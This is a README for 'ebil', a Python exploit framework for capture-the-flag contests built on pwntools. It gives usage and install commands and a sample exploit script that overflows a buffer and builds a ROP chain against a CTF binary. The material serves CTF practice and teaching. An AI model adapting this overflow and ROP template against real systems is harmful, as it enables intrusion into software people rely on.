/ebil

Exploit code framework for CTFs

Primary LanguagePythonGNU General Public License v2.0GPL-2.0

ebil

ebil is an exploit code framework for CTFs, based on pwntools

Command line tools + python library

Command line tools

ebil new <process> -> ./exploit.py with process will be generated

Python library

pip install ./py

usage:

./exploit.py   # run locally
./exploit.py p # run locally (pause on breakpoints)
./exploit.py r # remote

exploit.py:

#!/usr/bin/env python
from ebil import *

exec ebil('./vuln', remote=('pwnable.example.com', 35555), args=['wei'], arch='x86_64')

if LOCAL: log.info('** LOCAL **')

payload = 'a'*140

dummy = 0xbeefbeefbeefbeef
payload += chain([
  elf.symbols['write'], dummy, 1, 0x8049348, 4,
])
send(payload, 200)

print repr(r.recvrepeat())

r.wait_for_close()

Installation

git clone https://github.com/193s/ebil && cd ebil
install -v ebil /usr/local/bin
pip install ./py

License

Copyright (c) 2015 193s

Published under the GNU GPLv2, see ./LICENSE